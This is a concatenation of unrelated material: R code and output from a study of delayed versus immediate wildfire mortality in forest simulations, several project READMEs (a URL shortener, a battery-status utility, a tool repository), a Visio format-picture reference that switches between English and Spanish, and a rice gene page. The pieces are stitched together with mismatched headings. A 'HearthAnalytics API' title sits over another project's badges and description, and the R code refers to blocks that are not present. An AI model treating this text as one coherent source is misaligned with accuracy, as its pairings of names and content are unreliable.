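The ten `read.csv`/`CalculatePerc` blocks earlier in this chunk differ only in the run folder, so a loop over run names can build `Runs` and `Runs_Bio` in one pass. Sketched with a stub reader, since the real scrapple logs live under `Folder1` (the `62500/(24*1e6)` factor is taken as given; it presumably converts grams on 250 m cells over the 24 simulated years into Mg per year):

``` r
runs <- c(paste0("GA_Model_D", 1:5, "_R2"), paste0("GA_Model_ND", 1:5, "_R2"))

# Stub standing in for read.csv(paste0(Folder1, run, "/scrapple-events-log.csv")).
ReadStub <- function(run) data.frame(CohortsKilled         = c(1, 2, 3),
                                     AvailableCohorts      = c(4, 5, 6),
                                     TotalBiomassMortality = c(1e6, 2e6, 3e6))

Runs2 <- do.call(rbind, lapply(runs, function(run) {
  Csv <- ReadStub(run)
  data.frame(Run  = ifelse(grepl("_ND", run), "Immediate Mortality", "Delayed Mortality"),
             Perc = sum(Csv$CohortsKilled) / sum(Csv$AvailableCohorts),
             Bio  = sum(Csv$TotalBiomassMortality) * (62500 / (24 * 1e6)))
}))
table(Runs2$Run)  # 5 Delayed Mortality, 5 Immediate Mortality
```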
``` r
median(Runs$Value[Runs$Run=="Delayed Mortality"])
```
    ## [1] 0.3979959
``` r
max(Runs$Value[Runs$Run=="Delayed Mortality"])
```
    ## [1] 0.403935
``` r
min(Runs$Value[Runs$Run=="Immediate Mortality"])
```
    ## [1] 0.2238418
``` r
median(Runs$Value[Runs$Run=="Immediate Mortality"])
```
    ## [1] 0.2423879
``` r
max(Runs$Value[Runs$Run=="Immediate Mortality"])
```
    ## [1] 0.2457687
``` r
p1 <- ggplot(Runs_Bio, aes(x=Run, y=Value)) + # fill=name allow to automatically dedicate a color for each group
geom_boxplot()+
xlab("") +
ggtitle("A )") +
ylab("Biomass removed (Mg per year)") +
theme_classic(base_size=16)
quantile(Runs_Bio$Value[Runs_Bio$Run=="Delayed Mortality"],.05)
```
    ## 5%
    ## 212199
``` r
median(Runs_Bio$Value[Runs_Bio$Run=="Delayed Mortality"])
```
    ## [1] 212610.9
``` r
quantile(Runs_Bio$Value[Runs_Bio$Run=="Delayed Mortality"],.95)
```
    ## 95%
    ## 263299.5
``` r
quantile(Runs_Bio$Value[Runs_Bio$Run=="Immediate Mortality"],.05)
```
    ## 5%
    ## 107067.8
``` r
median(Runs_Bio$Value[Runs_Bio$Run=="Immediate Mortality"])
```
    ## [1] 132722.2
``` r
quantile(Runs_Bio$Value[Runs_Bio$Run=="Immediate Mortality"],.95)
```
    ## 95%
    ## 163196.7
``` r
p2 <- ggplot(Runs, aes(x=Run, y=Value)) + # fill=name allow to automatically dedicate a color for each group
geom_boxplot()+
xlab("") +
ylab("Percent mortality per simulation") +
ggtitle("B )") +
theme_classic(base_size=16)
#min(Runs$Value[Runs$Run=="Delayed"])
quantile(Runs$Value[Runs$Run=="Delayed Mortality"],.05)
```
    ## 5%
    ## 0.3816605
``` r
median(Runs$Value[Runs$Run=="Delayed Mortality"])
```
    ## [1] 0.3979959
``` r
#max(Runs$Value[Runs$Run=="Delayed Mortality"])
quantile(Runs$Value[Runs$Run=="Delayed Mortality"],.95)
```
    ## 95%
    ## 0.403034
``` r
#min(Runs$Value[Runs$Run=="Immediate Mortality"])
quantile(Runs$Value[Runs$Run=="Immediate Mortality"],.05)
```
    ## 5%
    ## 0.224135
``` r
median(Runs$Value[Runs$Run=="Immediate Mortality"])
```
    ## [1] 0.2423879
``` r
quantile(Runs$Value[Runs$Run=="Immediate Mortality"],.95)
```
    ## 95%
    ## 0.2454835
``` r
grid.arrange(p1,p2,nrow=1)
```
``` r
g <- arrangeGrob(p1,p2,nrow=1)
ggsave(file="Biomass_ForPub.png",g,height = 7.0, width = 10.0, dpi = 200)
getwd()
```
    ## [1] "D:/Sapps_DM_paper"
# Standing Biomass
``` r
#### Standing biomass.
Biomass<-"E:/DM_runs_4_4/GA_Model_D1_R2/Biomass/"
LANDIS_Inputs<-"E:/DM_runs_4_4/GA_Model_D1_R2/"
#t<-1
#stragger<-0
#AllStack<-stack(paste0(Biomass,list.files(Biomass,pattern = paste0("\\-",(t+stagger),".img$"))))
Firemaps<-function(LANDIS_Inputs,t){
Fire1<-raster(paste0(LANDIS_Inputs,'scrapple-fire/ignition-type-',t,'.img'))
FireOn<-Fire1
FireOn[FireOn<=1]<-NA
FireOn[FireOn>1]<-1
plot(FireOn,ylim=c(0,400),xlim=c(0,400))
FireOff<-Fire1
FireOff[FireOff!=1]<-NA
plot(FireOff)
return(list(FireOn,FireOff))
}
Fire2<-Firemaps(LANDIS_Inputs,2)
FireOn<-Fire2[[1]]
FireOff<-Fire2[[2]]
# AllStack<-stack(paste0(Biomass,list.files(Biomass,pattern = paste0("\\-",(t+10),".img$"))))
#Bio_sum<-calc(AllStack,sum)
CalculateFrame<-function(Species,perc,FireOn,FireOff){
#perc<-AcerRubr_perc
One_percOn<-mean((as.vector(perc*FireOn)),na.rm=T)
One_percOff<-mean((as.vector(perc*FireOff)),na.rm=T)
OneSpecies<-data.frame(Species=c(Species,Species),
Fire=c(rep("Fire",length(One_percOn)),
rep("Landscape",length(One_percOff))),
Value=c(One_percOn,One_percOff))
OneSpecies<-na.omit(OneSpecies)
return(OneSpecies)
}
Sumstack2<-function(Biomass,t,stagger,FireOn,FireOff){
  AllStack<-stack(paste0(Biomass,list.files(Biomass,pattern = paste0("\\-",(t+stagger),".img$")))[c(FALSE,TRUE)])#
  Species<-c("LiriTuli","AcerRubr","NyssSylv","QuerAlba","PinuTaed","QuerPrin",
             "QuerCocc","PinuVirg","PinuStro","QuerRubr","QuerFalc")
  # Build one data frame per species, then stack them together
  AllFrameThree<-do.call(rbind,lapply(Species,function(sp){
    sp_perc<-AllStack[[which(grepl(sp,names(AllStack),fixed = TRUE))]]
    CalculateFrame(sp,sp_perc,FireOn,FireOff)
  }))
  AllFrameThree<-cbind(data.frame(Time=t,Stagger=stagger),AllFrameThree)
  return(AllFrameThree)}
Stagger<-function(LANDIS_Inputs,Biomass,Stagger){
  # Loop over simulation years 2-11, pairing each year's fire maps
  # with the matching biomass stack
  Years<-lapply(2:11,function(t){
    Fire<-Firemaps(LANDIS_Inputs,t)
    Sumstack2(Biomass,t,Stagger,Fire[[1]],Fire[[2]])
  })
  return(do.call(rbind,Years))
}
```
``` r
### Testing
#
# Fire2<-Firemaps(LANDIS_Inputs,3)
# FireOn<-Fire2[[1]]
# FireOff<-Fire2[[2]]
# Year2a<-Sumstack2(Biomass,3,0,FireOn,FireOff)
# sum(Year2a$Value)
# Year2<-Sumstack2(Biomass,3,-1,FireOn,FireOff)
# sum(Year2$Value)
#### Run each of the five replicates for a given stagger offset
RunReps<-function(stagger){
  reps<-lapply(1:5,function(i){
    Biomass<-paste0("E:/DM_runs_4_4/GA_Model_D",i,"_R2/Biomass/")
    LANDIS_Inputs<-paste0("E:/DM_runs_4_4/GA_Model_D",i,"_R2/")
    Stagger(LANDIS_Inputs = LANDIS_Inputs,Biomass,stagger)
  })
  do.call(rbind,reps)
}
#### Stagger 0 (year of fire)
StaggerAfter<-RunReps(0)
#### Stagger 1 (year before fire)
Staggerbefore<-RunReps(-1)
#write.csv(StaggerAfter,"StaggerAfter_428.csv")
#write.csv(Staggerbefore,"Staggerbefore_428.csv")
```
``` r
StaggerAfter<-read.csv('StaggerAfter_428.csv')
Staggerbefore<-read.csv('StaggerBefore_428.csv')
StaggerAfter$Fire[StaggerAfter$Fire=="Fire"]<-"Burned Sites (Delayed Mortality)"
#Stagger0$Fire[Stagger0$Fire=="NoFire"]<-"Unburned Landscape"
Fire<-StaggerAfter[StaggerAfter$Fire=="Burned Sites (Delayed Mortality)",]
#Fire0<-Staggeneg1[Staggeneg1$Fire=="Fire",]
Fire$Prior<-Staggerbefore$Value[Staggerbefore$Fire=="Fire"]
#print(Fire)
(sum(Fire$Value)-sum(Fire$Prior))/sum(Fire$Prior)
```
    ## [1] -0.1770432
``` r
Fire$Delta<-(Fire$Value-Fire$Prior)/Fire$Prior
Bars<-aggregate(x=list(Before=Fire$Prior,After=Fire$Value),by=list(Fire$Species),FUN=sum)
Bars$Dif<-(Bars$After-Bars$Before)/Bars$Before
#Bars
### Comparing total
#sum(Fire$Prior)
par(mar=c(8,8,8,8),bg="white")
barplot(Bars$Dif[order(Bars$Dif)]*100,names.arg=Bars$Group.1[order(Bars$Dif)],
        las=1,col="grey",xlab="Mean percent decrease in biomass",horiz=T)
```
<!-- -->
``` r
Before<-Bars[1:2]
Before$Model<-"Before"
After<-Bars[c(1,3)]
After$Model<-"After"
colnames(After)<-colnames(Before)
Data2<-rbind(Before,After)
g_legend<-function(a.gplot){
tmp <- ggplot_gtable(ggplot_build(a.gplot))
leg <- which(sapply(tmp$grobs, function(x) x$name) == "guide-box")
legend <- tmp$grobs[[leg]]
return(legend)}
p1 <- ggplot(Data2, aes(x=Group.1, y=Before,fill=Model)) +
ggtitle("mean biomass before/after fire") +
  #stat_compare_means(method = "wilcox.test",label = "p.format",size =6 )+ # fill=<name> would assign a color to each group automatically
geom_bar(stat="identity", position=position_dodge())+
theme_classic(base_size =16 )+
theme(legend.position="none")+
xlab("") +
ylab("Biomass g/m2")
p1
```
<!-- -->
# HearthAnalytics API
HearthAnalytics API is a backend for the HearthAnalytics application.
<p align="center">
<a href="https://travis-ci.org/NFarrington/vatsim-url-shortener"><img src="https://travis-ci.org/NFarrington/vatsim-url-shortener.svg" alt="Build Status"></a>
<a href="https://styleci.io/repos/128128792"><img src="https://styleci.io/repos/128128792/shield?style=flat" alt="Style Status"></a>
<a href="https://codeclimate.com/github/NFarrington/vatsim-url-shortener/maintainability"><img src="https://api.codeclimate.com/v1/badges/9e5d0eca2309ed1defd2/maintainability" alt="Maintainability"></a>
<a href="https://codeclimate.com/github/NFarrington/vatsim-url-shortener/test_coverage"><img src="https://api.codeclimate.com/v1/badges/9e5d0eca2309ed1defd2/test_coverage" alt="Test Coverage"></a>
<a href="https://hub.docker.com/r/nfarrington/vats.im-nginx"><img src="https://img.shields.io/docker/cloud/build/nfarrington/vats.im-nginx.svg?label=docker%20nginx" alt="Docker Build Status (nginx)"></a>
<a href="https://hub.docker.com/r/nfarrington/vats.im-php-fpm"><img src="https://img.shields.io/docker/cloud/build/nfarrington/vats.im-php-fpm.svg?label=docker%20php-fpm" alt="Docker Build Status (php-fpm)"></a>
</p>
# VATS.IM URL Shortener
[VATS.IM](https://vats.im/) is a URL shortening service designed for [VATSIM](https://vatsim.net/). The service offers short URLs across multiple domains, and URL prefixes for official VATSIM entities.
To make a feature request, or to report an issue, please [submit a new GitHub issue](https://github.com/NFarrington/vatsim-url-shortener/issues/new) or contact [support@vats.im](mailto:support@vats.im).
## License
Licensed under the [MIT license](https://opensource.org/licenses/MIT).
# ./battery_charge
`battery_charge` is a simple cross-platform command line utility (python3) for checking battery status.
All the script does is to show the current battery percentage and whether it is charging.
### Dependency
- Python 3
- Linux: `upower` UPower command line tool (comes with the system for Ubuntu)
- OS X: `ioreg` (comes with the system)
- Windows: `wmi` python module
    - install with `pip install wmi`, using the `pip` from Python 3
### Install
- `./setup.py install` (run with `sudo` on Linux)
### Platform Tested
- Windows 10
- OS X 10.10.5 (Yosemite)
- Ubuntu 14.04 (Trusty Tahr)
### Usage
You will need to put "X:/Python3X/Scripts" into your PATH on Windows.
```bash
$ battery_charge
99 ac_power
```
Use `read` command to get both the battery percentage and the status into variables.
```bash
$ bat_info=`battery_charge | tr -d '\r\n'`
$ read bat_percentage bat_status <<< $bat_info
$ echo $bat_percentage
95
$ echo $bat_status
discharging
```
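The same two fields can also be consumed from Python, the tool's implementation language. A minimal sketch — the `parse_battery` helper and the sample output string below are illustrative, not part of the package:

```python
import subprocess

def parse_battery(output: str):
    """Split battery_charge's 'PERCENT STATUS' line into (int, str)."""
    percent, status = output.strip().split()
    return int(percent), status

# In real use you would run the installed command, e.g.:
#   output = subprocess.run(["battery_charge"], capture_output=True, text=True).stdout
# Here a sample line stands in for it:
output = "95 discharging\n"
percent, status = parse_battery(output)
print(percent, status)  # 95 discharging
```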
### About Battery Status
| Status Value | Linux | Mac | Windows |
|--------------|--------------------------|---------------|-----------------------------------------------------------------------------------|
| discharging | battery is discharging | same | same |
| charging | battery is charging | same | same |
| ac_power | battery is fully charged | same as Linux | battery is not necessarily fully charged, but the system is running on AC adapter |
### Use with zsh (or any other shell)
You could create a battery segment on $PS1 using this script with Oh-my-zsh + agnoster theme.
Here are some demos. See `demo/zsh_prompt` for more detail.
#### Mac
- Running on AC adapter

- Charging

#### Windows
- Changing from Battery to AC adapter

- Low Battery Warning (<20%)

### License
The MIT License (MIT)
#### Introduction
A small utility with weather forecast and countdown features; still a work in progress.
---
title: Imágenes de formato
manager: soliver
ms.date: 03/09/2015
ms.audience: Developer
ms.topic: overview
f1_keywords:
- Vis_DSS.chm82251831
ms.localizationpriority: medium
ms.assetid: df4c1c70-8b41-c046-7415-643188af0e06
description: Format pictures are used to determine how a value is displayed. For example, you can control how many digits appear to the right or left of the decimal separator, or whether a text string is displayed in uppercase or lowercase.
ms.openlocfilehash: 3e9510f4e2056477f5c0a1298d9fd76894a07ec2
ms.sourcegitcommit: a1d9041c20256616c9c183f7d1049142a7ac6991
ms.translationtype: MT
ms.contentlocale: es-ES
ms.lasthandoff: 09/24/2021
ms.locfileid: "59598951"
---
# <a name="about-format-pictures"></a>About format pictures
Format pictures are used to determine how a value is displayed. For example, you can control how many digits appear to the right or left of the decimal separator, or whether a text string is displayed in uppercase or lowercase.
> [!NOTE]
> To define a date or time format picture using the Microsoft Office System format, place the picture between double braces, for example, "{{d/m/yy}}". If you use a predefined format, for example, 201, enclose it in braces and angle brackets, like this: "{ \<201\> }"
The following sections show the symbols you can use to format different types of display values.
## <a name="string-and-numeric-values"></a>String and numeric values
|**Character**|**Description**|
|:-----|:-----|
|# <br/> |Digit placeholder. Displays a digit or nothing. Leading and trailing zeros are not displayed. If there are more digits to the left of the decimal than placeholders, all digits are displayed. If there are more digits to the right of the decimal than placeholders, the fraction is rounded to the total number of placeholders. For a dimension, if the placeholder is the leftmost digit, nonzero subunits are not displayed. <br/> For example, FORMAT(0 ft 11.25 in,"#.## u") displays 11.25 in. <br/> |
|0 <br/> |Digit placeholder (zero). Displays a digit or nothing. Leading and trailing zeros are displayed. If there are more digits to the left of the decimal than placeholders, all digits are displayed. If there are more digits to the right of the decimal than placeholders, the fraction is rounded to the total number of placeholders. For a dimension, zero subunits are displayed. <br/> For example, FORMAT(2 ft 11.33 in,"0.## u") displays 2 ft 11.33 in. <br/> |
|. <br/> |Decimal placeholder. Determines how many digits appear to the left and right of the decimal separator. For multipart units, decimals apply to the smallest (rightmost) subunit. Displays the decimal character defined in the system's **Regional and Language Options** (Control Panel). <br/> For example, FORMAT(250 cm,"0.000 u") displays 250.000 cm. <br/> |
|, <br/> |Thousands separator. If surrounded by digit placeholders (# or 0), separates thousands from hundreds in numbers that have four or more digits to the left of the decimal separator. Displays the thousands separator defined in the system's **Regional and Language Options** (Control Panel). <br/> |
|E- E+ e- e+ <br/> |Scientific format. If the format contains at least one digit placeholder to the right of these symbols, the number is displayed in scientific format. Inserts E or e between the number and its exponent. For E+ or e+, a plus sign (+) is displayed before positive exponents and a minus sign (-) before negative exponents. For E- or e-, a minus sign (-) appears only when the exponent is negative. <br/> For example, FORMAT(12345.67,"###.#e+#") displays 123.5e+2. <br/> |
|u or U <br/> |Abbreviated label placeholder. Inserts abbreviated unit indicators after each subunit. For example: in., ft., deg. The U placeholder inserts mixed-case labels, while the u placeholder inserts lowercase labels. Inserts the same number of spaces before the label as appear before the placeholder. <br/> For example, FORMAT(12 c 13 d,"#u") displays 13c1. <br/> |
|uu or UU <br/> |Long label placeholder. Inserts unit labels after each subunit. For example: inches, feet, degrees. The U placeholder inserts mixed-case labels, while the u placeholder inserts lowercase labels. Inserts the same number of spaces before the label as appear before the placeholder. <br/> For example, FORMAT(12.43 in,"# #/4 UU") displays 12 2/4 INCHES. <br/> |
|uuu or UUU <br/> |Universal label placeholder. Inserts the universal (Visio-internal) form of unit labels after each subunit. The U placeholder inserts mixed-case labels, while the u placeholder inserts lowercase labels. Inserts the same number of spaces before the label as appear before the placeholder. <br/> |
|/ <br/> |Fraction placeholder. Displays an expression as a whole number with a fraction if there is a digit placeholder; otherwise, displays only the whole number in the numerator. If a number follows the digit placeholder in the denominator, the fraction is rounded to the next fraction whose numerator is 1 and is simplified. If a number is specified in the denominator without a digit placeholder, the fraction is rounded to the next such fraction but is not simplified. <br/> For example, FORMAT(12.43,"# #/4") displays 12 2/4. <br/> |
|space <br/> |Displays a space character in the formatted output. To display another character, use the backslash (\) character. <br/> |
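As a rough illustration of the difference between the "#" and "0" digit placeholders, here is a small Python model of the decimal-rounding and trailing-zero behavior described above (an approximation for intuition only, not Visio's actual implementation — `picture_number` is a hypothetical helper):

```python
def picture_number(value, dec_places, pad_zeros):
    """Round to dec_places decimals; '0' placeholders (pad_zeros=True)
    keep trailing zeros, '#' placeholders strip them."""
    s = f"{value:.{dec_places}f}"      # round to the placeholder count
    if not pad_zeros:
        s = s.rstrip("0").rstrip(".")  # '#' hides trailing zeros
    return s

print(picture_number(250, 3, True))    # "0.000 u"-style picture: 250.000
print(picture_number(11.25, 2, False)) # "#.## u"-style picture: 11.25
print(picture_number(11.20, 2, False)) # trailing zero dropped: 11.2
```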
## <a name="currency-values"></a>Currency values
|**Character**|**Description**|
|:-----|:-----|
|$ <br/> |Currency symbol. Displays the currency symbol defined in the system's **Regional and Language Options** (Control Panel). <br/> |
|u or U <br/> |Abbreviated label placeholder. Inserts the standard symbol for the local currency, or the three-character abbreviation for non-local currencies. For example, $99.00, 42.70 FRF. The u placeholder inserts lowercase labels and U inserts mixed-case labels. <br/> |
|uu or UU <br/> |Long label placeholder. Inserts long currency labels after each subunit. For example: US Dollar, French Franc. The u placeholder inserts lowercase labels and U inserts mixed-case labels. <br/> |
|uuu or UUU <br/> |Universal label placeholder. Inserts the universal three-character abbreviations for all currencies after each subunit. For example, 99.00 USD, 42.70 FRF. The u placeholder inserts lowercase labels and U inserts mixed-case labels. Inserts the same number of spaces before the label as appear before the placeholder. <br/> |
## <a name="text-values"></a>Text values
|**Character**|**Description**|
|:-----|:-----|
|\ <br/> |Displays the next character as is. To display the backslash character, type \\. See also "text". <br/> |
|"text" or 'text' <br/> |Displays the text between the quotation marks as is. See also \ (backslash). <br/> |
|@ <br/> |Text placeholder. Replaces a string if the value of an expression is a string. <br/> For example, FORMAT("Hello", "'You typed ('@')'") results in "You typed (Hello)". <br/> |
|@+ <br/> |Uppercase text placeholder. For string values, converts the value to uppercase. <br/> For example, FORMAT("Hello", "@ @+ @-") results in "Hello HELLO hello". <br/> |
|@- <br/> |Lowercase text placeholder. For string values, converts the value to lowercase. <br/> For example, FORMAT("Hello", "@ @+ @-") results in "Hello HELLO hello". <br/> |
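The three text placeholders can be modeled in a few lines of Python (illustrative only — `apply_text_picture` is a hypothetical helper, not a Visio API):

```python
def apply_text_picture(value: str, placeholder: str) -> str:
    """Mimic the @, @+ and @- placeholders for string values."""
    if placeholder == "@+":
        return value.upper()   # uppercase text placeholder
    if placeholder == "@-":
        return value.lower()   # lowercase text placeholder
    return value               # plain @ substitutes the string as is

parts = [apply_text_picture("Hello", p) for p in ("@", "@+", "@-")]
print(" ".join(parts))  # Hello HELLO hello
```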
## <a name="date-values"></a>Date values
|**Character**|**Description**|
|:-----|:-----|
|c or C <br/> |Date or time placeholder. Displays date and time values using the short (c) or long (C) date format, and the general time format. Visio versions 4.0 and earlier ignore this placeholder. <br/> For example: FORMAT(DATETIME("25/6/07 12:05"),"C") displays Monday, June 25, 2007 12:05:00 PM. FORMAT(DATETIME("25 Jun 2007"),"c") displays 25/6/07. <br/> |
|/ <br/> |Date separator. If the expression is a date, separates its components. Displays the date separator defined in the system's **Regional and Language Options** (Control Panel). <br/> |
| [ ] <br/> |Elapsed-date placeholder. Used with the d, dd, and ww placeholders to display units of duration. <br/> For example, [d] or [dd] is elapsed days and [w] or [ww] is elapsed weeks. <br/> |
|d <br/> |Day placeholder. Displays the day as a number (1 to 31), without a leading zero. <br/> |
|dd <br/> | Day placeholder. Displays the day as a number (01 to 31), with a leading zero. <br/> |
|ddd or w <br/> |Abbreviated weekday placeholder. Displays the day in abbreviated form (Mon to Sun). <br/> |
|dddd or ww <br/> |Unabbreviated weekday placeholder. Displays the day as a full name (Monday to Sunday). <br/> |
|ddddd <br/> |Short date placeholder. Displays a date using the short form defined in the system's **Regional and Language Options** (Control Panel). <br/> |
|dddddd <br/> |Long date placeholder. Displays a date using the long form defined in the system's **Regional and Language Options** (Control Panel). <br/> |
|D <br/> |Traditional Chinese day placeholder. Displays the day of the month as a textual representation of the ordinal number. Locale-specific. <br/> |
|D_c <br/> |Traditional Chinese day placeholder. Displays the day of the month as a textual representation of the ordinal number. Independent of the user's locale. <br/> |
|w_c or ww_c <br/> |Traditional Chinese day placeholder. Independent of the user's locale. <br/> |
|w_e <br/> |Abbreviated English weekday placeholder. Displays the day in abbreviated form (Sun to Sat). Independent of the user's locale. <br/> |
|w_j <br/> |Abbreviated Japanese weekday placeholder. Displays the day in abbreviated form. Independent of the user's locale. <br/> |
|w_k <br/> |Abbreviated Korean weekday placeholder. Displays the day in abbreviated form. Independent of the user's locale. <br/> |
|w_s or ww_s <br/> |Simplified Chinese day placeholder. Independent of the user's locale. <br/> |
|ww_e <br/> |Unabbreviated English weekday placeholder. Displays the day as a full name (Sunday to Saturday). Independent of the user's locale. <br/> |
|ww_j <br/> |Unabbreviated Japanese weekday placeholder. Displays the day as a full name. Independent of the user's locale. <br/> |
|ww_k <br/> |Unabbreviated Korean weekday placeholder. Displays the day as a full name. Independent of the user's locale. <br/> |
|M <br/> |Month placeholder. Displays the month as a number (1 to 12), without a leading zero. See also m (minute placeholder). <br/> |
|MM <br/> |Month placeholder. Displays the month as a number (01 to 12), with a leading zero. See also mm (minute placeholder). <br/> |
|MMM <br/> |Month placeholder. Displays the month in abbreviated form (Jan to Dec). <br/> |
|MMMM <br/> |Month placeholder. Displays the full month name (January to December). <br/> |
|MMMM_c <br/> |Traditional Chinese month placeholder. Displays the full month name. Independent of the user's locale. <br/> |
|MMMM_e <br/> |English month placeholder. Displays the full month name. Independent of the user's locale. <br/> |
|yy <br/> |Year placeholder. Displays the year as a two-digit number (00 to 99). <br/> |
|yyyy <br/> |Year placeholder. Displays the year as a four-digit number (1900 to 2078). <br/> |
|g <br/> |Year placeholder. Locale-specific. In Japanese, displays the abbreviated form of the Gengo era. In Korean, displays the Korean year label, followed by a space. <br/> |
|g_j <br/> |Year placeholder. In Japanese, displays the abbreviated form of the Gengo era. Independent of the user's locale. <br/> |
|gg or G <br/> |Year placeholder. Locale-specific. In Traditional Chinese, displays the abbreviated form of the year label. In Japanese, displays the abbreviated form of the Gengo era in Kanji. In Korean, displays the Korean year label, followed by a space. <br/> |
|gg_c <br/> |Year placeholder. In Traditional Chinese, displays the abbreviated form of the year label. Independent of the user's locale. <br/> |
|gg_j <br/> |Year placeholder. In Japanese, displays the abbreviated form of the Gengo era in Kanji. Independent of the user's locale. <br/> |
|gg_k <br/> |Year placeholder. In Korean, displays the Korean year label, followed by a space. Independent of the user's locale. <br/> |
|ggg or GG <br/> |Year placeholder. Locale-specific. In Traditional Chinese, displays the full form of the year label. In Japanese, displays the full form of the Gengo era in Kanji. In Korean, displays the Korean year label, followed by a space. <br/> |
|ggg_c <br/> |Year placeholder. In Traditional Chinese, displays the full form of the year label. Independent of the user's locale. <br/> |
|ggg_j <br/> |Year placeholder. In Japanese, displays the full form of the Gengo era in Kanji. Independent of the user's locale. <br/> |
|e <br/> |Year placeholder. Locale-specific. In Traditional Chinese, displays the string representing the Julian year. In Japanese, displays the Gengo year as one or two digits, without a leading zero. In Korean, displays the Korean year as a four-digit Arabic numeral. <br/> |
|e_c <br/> |Year placeholder. In Traditional Chinese, displays the string representing the Julian year. Independent of the user's locale. <br/> |
|e_j <br/> |Year placeholder. In Japanese, displays the Gengo year as one or two Arabic digits. Independent of the user's locale. <br/> |
|e_k <br/> |Year placeholder. In Korean, displays the Korean year as a four-digit Arabic numeral. Independent of the user's locale. <br/> |
|E <br/> |Year placeholder. Locale-specific. In Traditional Chinese, displays the string representing the year of the republic. In Japanese, displays the Gengo year as one or two digits, without a leading zero. In Korean, displays the Korean year as a four-digit Arabic numeral. <br/> |
|E_c <br/> |Year placeholder. In Traditional Chinese, displays the string representing the year of the republic. Independent of the user's locale. <br/> |
|ee <br/> |Year placeholder. Locale-specific. In Traditional Chinese, displays the string representing the Julian year. In Japanese, displays the Gengo year as one or two Arabic digits, with a leading zero if needed. In Korean, displays the Korean year as a four-digit Arabic numeral. <br/> |
|ee_j <br/> |Year placeholder. In Japanese, displays the Gengo year as two Arabic digits. Independent of the user's locale. <br/> |
|EE <br/> |Year placeholder. Locale-specific. In Traditional Chinese, displays the string representing the year of the republic. In Japanese, displays the Gengo year as one or two Arabic digits, with a leading zero if needed. In Korean, displays the Korean year as a four-digit Arabic numeral. <br/> |
|n or N <br/> |Year placeholder. Locale-specific. In Traditional Chinese, displays the year of the republic as an Arabic numeral. In Japanese, displays the Gengo year as one or two digits, without a leading zero. In Korean, displays the Korean year as a four-digit Arabic numeral. <br/> |
|n_c <br/> |Year placeholder. In Traditional Chinese, displays the year of the republic as an Arabic numeral. Independent of the user's locale. <br/> |
|nn or NN <br/> |Year placeholder. Locale-specific. In Traditional Chinese, displays the year of the republic as an Arabic numeral. In Japanese, displays the Gengo year as one or two Arabic digits, with a leading zero if needed. In Korean, displays the Korean year as a four-digit Arabic numeral. <br/> |
## <a name="time-values"></a>Valores de hora
|**Carácter**|**Descripción**|
|:-----|:-----|
|: <br/> |Separador de hora. Muestra la hora definida en la **configuración regional y de idioma** del sistema (Panel de control).<br/> |
|[ ] <br/> |Marcador de posición de tiempo transcurrido. Se utiliza con los marcadores de posición h, hh, m, mm, s y ss para mostrar las unidades de duración. Por ejemplo, [h] o [hh] son las horas, [m] o [mm] los minutos y [s] o [ss] los segundos transcurridos. <br/> |
|h <br/> |Marcador de posición de hora. Muestra la hora sin cero a la izquierda, en formato de 12 horas (de 0 a 12). <br/> |
|hh <br/> |Marcador de posición de hora. Muestra la hora con cero a la izquierda, en formato de 12 horas (de 00 a 12). <br/> |
|H <br/> |Marcador de posición de hora. Muestra la hora sin cero a la izquierda, en formato de 24 horas (de 0 a 24). <br/> |
|HH <br/> |Marcador de posición de hora. Muestra la hora con cero a la izquierda, en formato de 24 horas (de 00 a 24). <br/> |
|m <br/> |Marcador de posición de minuto. Muestra los minutos sin cero a la izquierda (de 0 a 59). <br/> |
|mm <br/> |Marcador de posición de minuto. Muestra los minutos con cero a la izquierda (de 00 a 59). <br/> |
|s <br/> |Marcador de posición de segundo. Muestra los segundos sin cero a la izquierda (de 0 a 59). <br/> |
|ss <br/> |Marcador de posición de segundo. Muestra los segundos con cero a la izquierda (de 00 a 59). <br/> |
|t <br/> |Abreviatura a.m. o p.m. Muestra la abreviatura definida en la **configuración regional y de idioma** del sistema (Panel de control).<br/> |
|tt <br/> |Indicador de a.m. o p.m. Muestra el indicador completo definido en la **configuración regional y de idioma** del sistema (Panel de control).<br/> |
|t_c o tt_c <br/> |Indicador a.m. o p.m. en chino tradicional. Muestra el indicador. Independiente de la configuración regional del usuario. <br/> |
|t_k o tt_k <br/> |Indicador a.m. o p.m. en coreano. Muestra el indicador. Independiente de la configuración regional del usuario. <br/> |
|t_j o tt_j <br/> |Indicador a.m. o p.m. en japonés. Muestra el indicador. Independiente de la configuración regional del usuario. <br/> |
|t_e <br/> |Indicador a.m. o p.m. en inglés. Muestra el indicador abreviado. Independiente de la configuración regional del usuario. <br/> |
|tt_e <br/> |Indicador a.m. o p.m. en inglés. Muestra el indicador completo. Independiente de la configuración regional del usuario. <br/> |
|t_s o tt_s <br/> |Indicador a.m. o p.m. en chino simplificado. Muestra el indicador. Independiente de la configuración regional del usuario. <br/> |
|T <br/> |Formato de hora general. <br/> |
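As an illustration of how these placeholders combine in a custom format string (the sample values and output below are illustrative for an en-US system; the actual separators and AM/PM strings follow the user's regional settings):

```
hh:mm:ss tt  ->  05:04:23 PM
H:mm         ->  17:04
[hh]:mm      ->  26:15   (elapsed time that has passed 24 hours)
```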
# orphans
Orphaned tools/scripts that might be useful but don't currently have a good home elsewhere in our public repositories.
Some of these may be migrated at a future date.
# LICENSE
Tools here are licensed under the BSD 3 clause license (BSD-3) unless otherwise noted in the individual files.
We reserve the right to re-license tools contributed to this repository under other licenses as we deem appropriate.
# MANIFEST
- analysis: Contains tools relating to analysis of MD simulations
# CONTRIBUTORS
- Gaetano Calabro
- David Mobley
---
layout: post
title: "OsWRKY28"
description: ""
category: genes
tags: [transcription factor, defense, disease resistance, disease, blast, defense response, magnaporthe oryzae, root, seedling, development, oxidative stress, oxidative, root development, root elongation, reproductive, architecture, homeostasis, ja , fertility, JA, phosphate, root system architecture]
---
* **Information**
+ Symbol: OsWRKY28
+ MSU: [LOC_Os06g44010](http://rice.uga.edu/cgi-bin/ORF_infopage.cgi?orf=LOC_Os06g44010)
+ RAPdb: [Os06g0649000](http://rapdb.dna.affrc.go.jp/viewer/gbrowse_details/irgsp1?name=Os06g0649000)
* **Publication**
+ [OsWRKY28, a PAMP-responsive transrepressor, negatively regulates innate immune responses in rice against rice blast fungus](http://www.ncbi.nlm.nih.gov/pubmed?term=OsWRKY28, a PAMP-responsive transrepressor, negatively regulates innate immune responses in rice against rice blast fungus%5BTitle%5D), 2013, Plant Mol Biol.
